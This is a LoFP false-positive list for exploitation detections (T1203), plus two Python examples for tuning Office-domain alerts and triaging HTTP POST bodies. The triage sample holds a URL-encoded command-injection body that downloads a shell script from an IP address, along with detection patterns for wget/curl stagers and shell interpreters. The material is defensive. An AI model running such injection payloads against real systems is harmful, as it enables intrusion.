LoFP / t1203

t1203

Title
all kinds of software downloads
exploits that were attempted but unsuccessful.
it is highly recommended to baseline your activity and tune out common business use cases.
legitimate browser install, update and recovery scripts
legitimate use of scx runasprovider executescript.
legitimate use of scx runasprovider invoke_executeshellcommand.
office documents commonly have templates that refer to external addresses, like "sharepoint.ourcompany.com"; these may have to be tuned.
scanning attempts that use the http post method abnormally but show no indication of code execution within the http request body. an example would be vulnerability scanners trying to identify unpatched versions without actually exploiting the vulnerability. see the rule description for investigation tips.
unlikely
you may have to tune certain domains out that excel may call out to, such as microsoft or other business use case domains.
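The two tuning notes about Office template and Excel destinations come down to an allowlist of business domains applied to the destination host of the network event. The snippet below is an added example, not code from LoFP or from any of the underlying rules; the allowlist entries, the sample events and the field names (`image`, `dest_host`) are constructed for illustration. The point it makes is that the match has to be done on whole DNS labels, so that a look-alike such as `sharepoint.ourcompany.com.attacker.example` is not silently tuned out along with the real host.

```python
"""Tune Office network-connection alerts against an allowlist of business domains.

Added example (not LoFP's or any rule's own code). The allowlist, the sample
events and the field names are constructed for this example.
"""

# Hypothetical allowlist of domains Office applications legitimately call out
# to. These entries are illustrative; a real list comes from your own baseline.
BUSINESS_DOMAINS = {
    "sharepoint.ourcompany.com",
    "officecdn.microsoft.com",
    "office.com",
}

# Constructed sample events: the Office process and the host it connected to.
SAMPLE_EVENTS = [
    {"image": "EXCEL.EXE", "dest_host": "officecdn.microsoft.com"},
    {"image": "WINWORD.EXE", "dest_host": "sharepoint.ourcompany.com"},
    {"image": "WINWORD.EXE", "dest_host": "sharepoint.ourcompany.com.attacker.example"},
    {"image": "EXCEL.EXE", "dest_host": "login.office.com"},
    {"image": "POWERPNT.EXE", "dest_host": "198.51.100.23"},
    {"image": "EXCEL.EXE", "dest_host": "evil-office.com"},
]


def host_allowed(host, allowlist=BUSINESS_DOMAINS):
    """Return True if host is an allowlisted domain or a subdomain of one.

    The comparison walks the label suffixes of the host ("a.b.c" -> "a.b.c",
    "b.c", "c"), so a substring match can never suppress look-alikes such as
    "evil-office.com" or "office.com.attacker.example".
    """
    labels = host.rstrip(".").lower().split(".")
    return any(".".join(labels[i:]) in allowlist for i in range(len(labels)))


def tune(events, allowlist=BUSINESS_DOMAINS):
    """Return the events that survive tuning and still need an analyst's look."""
    return [e for e in events if not host_allowed(e["dest_host"], allowlist)]


if __name__ == "__main__":
    for event in tune(SAMPLE_EVENTS):
        print(f"{event['image']:12} -> {event['dest_host']}")
```

Bare IP destinations never match a domain allowlist and therefore always surface, which is usually what you want for an Office process. Keep the allowlist to registrable domains you own or trust; an entry such as `com` would suppress everything under that TLD.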
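The note about scanners using abnormal HTTP POST requests separates "probe" traffic (a POST with nothing in the body that would run code) from an actual exploitation attempt. The following is an added example of that triage, not code from LoFP or from any rule: the indicator patterns are hypothetical and illustrative only, and the sample requests are constructed. A real rule derives its body patterns from the specific vulnerability it covers; the structure shown here is the part that carries over.

```python
"""Triage HTTP POST events: probe-only scanner traffic vs. payload-bearing requests.

Added example, not LoFP's or any detection rule's code. The indicator list and
the sample requests below are constructed for this example.
"""
import re
from urllib.parse import unquote_plus

# Hypothetical indicators that a request body is trying to run code. This list
# is illustrative only; a production rule would use patterns specific to the
# vulnerability being detected.
CODE_EXEC_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"(?:\bcmd(?:\.exe)?\b|\bpowershell\b|/bin/(?:ba)?sh\b)",  # interpreters
        r"\$\([^)]*\)|`[^`]*`",                                     # shell substitution
        r"\b(?:wget|curl)\s+https?://",                             # download stagers
        r"<\?php|\beval\s*\(",                                      # inline script bodies
    )
]

# Constructed sample events: method, path and the raw (URL-encoded) body.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/login", "body": "user=bob&pass=hunter2"},
    {"method": "POST", "path": "/api/status", "body": ""},
    {"method": "POST", "path": "/api/run",
     "body": "cmd=%24%28wget+http%3A%2F%2F198.51.100.5%2Fx.sh%29"},
    {"method": "POST", "path": "/upload", "body": "file=<?php echo 1; ?>"},
    {"method": "GET", "path": "/index.html", "body": ""},
]


def body_indicators(body):
    """Return the patterns that match the URL-decoded request body."""
    decoded = unquote_plus(body)
    return [p.pattern for p in CODE_EXEC_PATTERNS if p.search(decoded)]


def triage(event):
    """Classify one request.

    'probe'    POST with no code-execution indicator in the body: scanner-like,
               a candidate for tuning once the source is understood
    'exploit?' POST whose body carries an indicator: investigate
    'ignore'   not a POST
    """
    if event["method"] != "POST":
        return "ignore"
    return "exploit?" if body_indicators(event["body"]) else "probe"


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{triage(req):9} {req['method']} {req['path']}")
```

Decode the body before matching; scanners and exploits alike URL-encode the interesting characters, and a pattern applied to the raw form misses `%24%28`. The "probe" bucket is still worth a look at source volume and target paths before it is tuned out, since a scanner mapping unpatched versions is often the step before the real request.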